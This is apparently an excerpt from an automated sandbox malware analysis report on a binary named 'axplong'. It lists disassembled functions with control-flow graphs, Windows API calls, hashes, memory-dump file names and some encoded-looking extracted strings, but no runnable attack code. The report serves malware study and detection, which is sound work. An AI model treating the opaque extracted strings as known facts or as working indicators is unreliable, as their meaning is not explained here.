                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: a166eb1c114a74b41ea33f785f1f5a1fa22bdc7b9f41bb596b923f984c37ceb4
                        • Instruction ID: 205db82eb276414871eddd3b98c2cca1a8feca3e310a0ef61637d30328594756
                        • Opcode Fuzzy Hash: a166eb1c114a74b41ea33f785f1f5a1fa22bdc7b9f41bb596b923f984c37ceb4
                        • Instruction Fuzzy Hash: 635116B1D102089FDB24FB68CD497DDB7B6DB46310F5042A9E805A7381EF349E808FA5
                        Function 006D6C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1500 6d6c99-6d6ca5 1501 6d6cc4-6d6ce8 call 6d4020 1500->1501 1502 6d6ca7-6d6cc3 call 6d7430 call 6d7443 call 6d6b8a 1500->1502 1508 6d6cea-6d6d04 call 6d7430 call 6d7443 call 6d6b8a 1501->1508 1509 6d6d06-6d6d28 CreateFileW 1501->1509 1531 6d6d72-6d6d76 1508->1531 1510 6d6d38-6d6d3f call 6d6d77 1509->1510 1511 6d6d2a-6d6d2e call 6d6e01 1509->1511 1522 6d6d40-6d6d42 1510->1522 1518 6d6d33-6d6d36 1511->1518 1518->1522 1524 6d6d64-6d6d67 1522->1524 1525 6d6d44-6d6d61 call 6d4020 1522->1525 1529 6d6d69-6d6d6f 1524->1529 1530 6d6d70 1524->1530 1525->1524 1529->1530 1530->1531
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f24b96d6cf7bf910730ea47641348f2e80a5203dd72387c3f5c22cfe6da9d77
                        • Instruction ID: 6f5a5afd3bf305b79c2bd3163184ca3ae582e273c179ab415606f167e1e27ddb
                        • Opcode Fuzzy Hash: 9f24b96d6cf7bf910730ea47641348f2e80a5203dd72387c3f5c22cfe6da9d77
                        • Instruction Fuzzy Hash: 2A21F831E052087AEB11BB64EC42B9E376B9F41378F204316F9242B3D1DBB05E0596A6
                        Function 006D6F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1534 6d6f71-6d6f87 1535 6d6f89-6d6f8d 1534->1535 1536 6d6f97-6d6fa7 1534->1536 1535->1536 1537 6d6f8f-6d6f95 1535->1537 1540 6d6fa9-6d6fbb SystemTimeToTzSpecificLocalTime 1536->1540 1541 6d6fe7-6d6fea 1536->1541 1539 6d6fec-6d6ff7 call 6bcf21 1537->1539 1540->1541 1543 6d6fbd-6d6fdd call 6d6ff8 1540->1543 1541->1539 1546 6d6fe2-6d6fe5 1543->1546 1546->1539
                        APIs
                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 006D6FB3
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$LocalSpecificSystem
                        • String ID:
                        • API String ID: 2574697306-0
                        • Opcode ID: 3d8f88e0c0c57dd0599b377cc70bca44e4d0545c2f575564acbf5c2955b0a11b
                        • Instruction ID: 801d23c7b3c1b4c7e224921c194d2a52413384d0d025fdfca1ed8df32510e721
                        • Opcode Fuzzy Hash: 3d8f88e0c0c57dd0599b377cc70bca44e4d0545c2f575564acbf5c2955b0a11b
                        • Instruction Fuzzy Hash: 9511CBB290060CAACB10DF95D945EDEB7BEAF48310F505266F511E6281EB30EB458B61
                        Function 006DD6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1547 6dd6ef-6dd6fa 1548 6dd6fc-6dd706 1547->1548 1549 6dd708-6dd70e 1547->1549 1548->1549 1550 6dd73c-6dd747 call 6d7443 1548->1550 1551 6dd727-6dd738 RtlAllocateHeap 1549->1551 1552 6dd710-6dd711 1549->1552 1557 6dd749-6dd74b 1550->1557 1554 6dd73a 1551->1554 1555 6dd713-6dd71a call 6d9c81 1551->1555 1552->1551 1554->1557 1555->1550 1560 6dd71c-6dd725 call 6d8cf9 1555->1560 1560->1550 1560->1551
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,006DA5ED,?,006D74AE,?,00000000,?), ref: 006DD730
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 73a7fdcf63fc64005faa0f2e1bddb378b228ad0cdf0bb4b14b7ce93b1cc7751b
                        • Instruction ID: 7d9a8adbdbaafa6e3a06f44ee14614c36c0e04416a63092a707c8e61ed5b5665
                        • Opcode Fuzzy Hash: 73a7fdcf63fc64005faa0f2e1bddb378b228ad0cdf0bb4b14b7ce93b1cc7751b
                        • Instruction Fuzzy Hash: FFF02E31D4612466DB313A229C01BAB3B9B9F817B0B198197FC14EB381CE21DC0043F5
                        Function 006B6AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: bc173597f2bbb16582a69d9df61d167f88813830b6fb691ea53c0e959cc10f07
                        • Instruction ID: df78f8e64dfdac9675f6f110a7318be8a1c434c0e27d7547be099ff7defb477e
                        • Opcode Fuzzy Hash: bc173597f2bbb16582a69d9df61d167f88813830b6fb691ea53c0e959cc10f07
                        • Instruction Fuzzy Hash: AAF0A9B1E00614EBC700BB68DD1775D7B76A747760F90035CE811672D2EA3859018BE6
                        Function 052E0D36 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8feb7c84365b1fad81342d1aac53a088ecaa3b9fecf4f358f2b58ee20b6697d
                        • Instruction ID: 41acc59b291e61a9a388b2de9b8a19ea510e25a0d958f7fbfb3ea51d9673ad9f
                        • Opcode Fuzzy Hash: a8feb7c84365b1fad81342d1aac53a088ecaa3b9fecf4f358f2b58ee20b6697d
                        • Instruction Fuzzy Hash: FB01E1EB0BC014BE5142C58A271C9F67A2FFEE77303B8852AF907D550192E4464B5230
                        Function 052E0D49 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f951f06e240c825e20d5cca95bc142fb9a986bac2dce13872a09fe5d3b98d88
                        • Instruction ID: 3c2ddbd173a252d6c2d09e1ba2a9adf01db43a7099f05990fda755a95e2f13e8
                        • Opcode Fuzzy Hash: 0f951f06e240c825e20d5cca95bc142fb9a986bac2dce13872a09fe5d3b98d88
                        • Instruction Fuzzy Hash: 110104EB07C108BE5142D4962B1CAF33A2FFEE67307F88526F903D550192E4464B4270
                        Function 052E0D66 Relevance: .1, Instructions: 82COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 494042b64e226637b2dbee7a4a6cbd12906e4c721d4fa61af937d26243142e05
                        • Instruction ID: bdd1b8a7e6c727c340b2f883a13d81f889c92cd71b827913825dc12735de3a7b
                        • Opcode Fuzzy Hash: 494042b64e226637b2dbee7a4a6cbd12906e4c721d4fa61af937d26243142e05
                        • Instruction Fuzzy Hash: 5111069B47C114AD5642C5A55A188F63F2FFEA76303B88866F843CA512E2D44A5B5270
                        Function 052E0DAB Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5c68b10a04ab20ae8ff8fb2abae26ba728ea0f79c9b2aa7962195a4d92be3ad
                        • Instruction ID: f27bad1382c32ada7e1df4220f309c6c2daa16a651b130d64ee689c9c667d1a3
                        • Opcode Fuzzy Hash: d5c68b10a04ab20ae8ff8fb2abae26ba728ea0f79c9b2aa7962195a4d92be3ad
                        • Instruction Fuzzy Hash: 1C0124AB4BC104EE5241C9A92B1C9FA362FFFA33303B8843AF403D5401D2E94A4B4230
                        Function 052E0D92 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d46e2b466a4b8834d0f658f4365cdc7324057d17f071008b7da9ede7ae3c7b7
                        • Instruction ID: 075f875d7615f316f6c1c134924888a7d3b4ea2a6c4d85194646f59dcb4fd1a7
                        • Opcode Fuzzy Hash: 7d46e2b466a4b8834d0f658f4365cdc7324057d17f071008b7da9ede7ae3c7b7
                        • Instruction Fuzzy Hash: BFF0F4AB0BD004FD1242C5A92B1C9F77A2FFEE67303B88576F403D5511E2D9464B5130
                        Function 052E0DD4 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a799edb6eaeb67137cde1ef6514327ac6338ffa17632e4960bc70fe35969bb1
                        • Instruction ID: f8980b918f931c3601cb54c960fb033fc3cbd078115bb8a6ed2476a09ea2fcb0
                        • Opcode Fuzzy Hash: 0a799edb6eaeb67137cde1ef6514327ac6338ffa17632e4960bc70fe35969bb1
                        • Instruction Fuzzy Hash: E4F0E2AB0BC004FD6146CAA6262C9B7762FFEA57303FCCA76F443C4402D2E9425B4530
                        Function 052E0E24 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ddbcb6a1ae3d6d1c99ba494357f3a6437690844a0e97a75132fef548338ae6c
                        • Instruction ID: 4e4c46546f185b8ea191865b84e6a448abf7b2e25beed926e4a6aa968ae8c274
                        • Opcode Fuzzy Hash: 9ddbcb6a1ae3d6d1c99ba494357f3a6437690844a0e97a75132fef548338ae6c
                        • Instruction Fuzzy Hash: 60F02EA387E140DD878385A110CD1B53BA3BF2B52039C09F6D082DA113D1DE435B8231
                        Function 052E0DED Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1616168b30c876c0d93a6ba026db4b59e0bae9b18f610ec8362bf7a89f0ecd9
                        • Instruction ID: 31534db463375e74a2bc239cd594b7c2b77d126c8b32faa4d50bc77b96585fa3
                        • Opcode Fuzzy Hash: f1616168b30c876c0d93a6ba026db4b59e0bae9b18f610ec8362bf7a89f0ecd9
                        • Instruction Fuzzy Hash: 88E02B974BC104EC1142C5A5275C5B7761BFEA57303F889BAF043D0401A2E9424B4030
                        Function 052E0E9D Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 664a6b9895b13f4b34ba07c22906a8fc5ffdb047e1b8c05021c1f7f12e8ad63b
                        • Instruction ID: 82cce5e93a280076744ac5ee683a6d113778c7c0f9fc8763c54c3344c441a7fe
                        • Opcode Fuzzy Hash: 664a6b9895b13f4b34ba07c22906a8fc5ffdb047e1b8c05021c1f7f12e8ad63b
                        • Instruction Fuzzy Hash: B3F027528BD255D98257C871555C1773E7BAE256103EC86BFF047C111381D9421B8130
                        Function 052E0E3E Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5326c8e1d158394253c381ee78ec4a532680a5e4456499ed54bb92a666dac7f
                        • Instruction ID: 939780d4af7f1207afef00476523cef1dc740e99c86d46677093d36b851dd741
                        • Opcode Fuzzy Hash: d5326c8e1d158394253c381ee78ec4a532680a5e4456499ed54bb92a666dac7f
                        • Instruction Fuzzy Hash: E1E0928387C24095C793CAA511CD6B17B977F7A52139C0AFAE19399643C2DB839B8362
                        Function 052E0E14 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4507f03d4f306dfd92e7cb85c0f5774fdbdcca5486a46d644f5d13a672ea3a32
                        • Instruction ID: ec1e5d0ff14100d22c22d32783669e353b3009b1a334bd753ff2a8f49b7c28b3
                        • Opcode Fuzzy Hash: 4507f03d4f306dfd92e7cb85c0f5774fdbdcca5486a46d644f5d13a672ea3a32
                        • Instruction Fuzzy Hash: 0FE02B9347C204DD0182D971229D677766BBF787303FC8ABAF047D5111C2E982C78030

                        Non-executed Functions

                        Function 006AE440 Relevance: 14.6, Strings: 11, Instructions: 878COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4p$fed3aa
                        • API String ID: 0-3096440064
                        • Opcode ID: df1e1435d0e9f6a6188f4bf144a15269832ce7aa785098b688b68f6c1038c803
                        • Instruction ID: c1aa9052ab39e1ee3d5c23202e101613c8b31f20a2b8d813236c4f9081fc4512
                        • Opcode Fuzzy Hash: df1e1435d0e9f6a6188f4bf144a15269832ce7aa785098b688b68f6c1038c803
                        • Instruction Fuzzy Hash: A372F6B0A04248DBEF14EF68C9497DE7FB6AF46304F50419DE805273C2D7799A88CB96
                        Function 006E3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: c8030a1ebf042db17d502c7ba83f0cafd6d1fa13027493bee2a9bddf7721cf25
                        • Instruction ID: dd797d2c0e39081ced5aac4cc96bb9a11cc2cedeccaff7ee865e3e7f23d7d9d5
                        • Opcode Fuzzy Hash: c8030a1ebf042db17d502c7ba83f0cafd6d1fa13027493bee2a9bddf7721cf25
                        • Instruction Fuzzy Hash: 40C23A71E096688FCB65CE29DD447E9B3B6EB48304F1441EAD84EE7340EB75AE858F40
                        Function 006E2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction ID: b3d6666d84c788a2f0dd6c6f1fe152b3e9e619646ad64144ffa80af8cfd3eb81
                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction Fuzzy Hash: 72F16F71E0125A9FDF14CFA9C8906EEB7B6FF88314F158269D519AB344D730AE41CB90
                        Function 006BD312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
